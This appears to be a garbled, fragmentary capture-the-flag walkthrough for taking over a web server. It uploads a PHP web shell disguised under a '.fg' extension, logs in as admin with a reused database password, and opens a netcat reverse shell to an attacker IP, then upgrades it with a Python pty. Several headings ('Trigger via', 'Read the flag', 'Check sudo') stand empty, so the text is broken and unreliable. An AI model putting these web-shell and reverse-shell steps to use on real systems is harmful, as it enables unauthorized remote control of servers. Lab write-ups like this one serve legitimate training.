Link Crackerfg -

eval system($_GET['cmd']);

Rename as shell.fg. After upload, the server stores it in /uploads/shell.fg. Trigger via:

Read the flag:

$db_user = "webapp";
$db_pass = "crackme_123";

Try admin:crackme_123 on the login page → success.

You get RCE as www-data.

# On attacker machine
nc -lvnp 4444

# Via the web shell
cmd=nc -e /bin/bash 10.10.14.14 4444

python3 -c 'import pty;pty.spawn("/bin/bash")'

Check sudo:

Stable shell:
